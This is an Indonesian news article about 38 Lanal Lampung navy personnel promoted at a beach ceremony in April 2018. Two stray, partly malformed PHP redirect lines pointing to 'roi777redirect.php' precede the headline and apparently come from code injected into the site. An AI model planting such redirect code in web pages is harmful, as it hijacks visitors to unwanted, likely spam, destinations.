header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); 38 Prajurit Lanal Lampung Resmi Kenakan Pangkat Baru -
38 Prajurit Lanal Lampung Resmi Kenakan Pangkat Baru

TRANSLAMPUNG.COM, LAMPUNG – Bertempat di pantai Klara, Bumi Perkemahan Lanal Lampung kabupaten Pesawaran, Komandan Lanal Lampung Kolonel Laut (P) Kelik Haryadi, S.H. M.Si. memimpin upacara pelantikan kenaikan pangkat periode 1 April 2018 terhadap 38 Prajurit Lanal Lampung, Rabu (04/04/2018).

Komandan Lanal Lampung menyampaikan sesungguhnya kenaikan pangkat bukanlah sesuatu hal yang otomatis, tetapi merupakan penghargaan atas segala jerih payah, dedikasi, loyalitas dan prestasi kerja.

“Saya ucapkan selamat, dengan kenaikan pangkat dapat mendorong motivasi dan semangat untuk memberikan pengabdian yang terbaik kepada bangsa dan negara melalui penugasan di Lanal Lampung” ujarnya

Dari 38 Prajurit yang naik pangkat pada 1 April 2018 terdiri dari satu orang Perwira, lima belas orang Bintara dan 22 orang Tamtama, dalam upacara di atas air para Prajurit yang naik pangkat selesai dinyatakan resmi menggunakan pangkat yang baru langsung mencelupkan diriya ke dalam air dibawah Komando dari Komandan Unit Intel, Kapten Laut (E) Budi Suharyanto selaku Komandan Upacara dilanjutkan dengan penyampaian ucapan selamat dari Komandan Lanal dan seluruh pasukan upacara serta dilanjutkan dengan pemberian santunan kepada panti asuhan Peduli Bangsa.

Turut hadir dalam upacara tersebut Palaksa Lanal, Para Perwira, Bintara, Tamtama dan PNS Lanal Lampung.(*)

News Reporter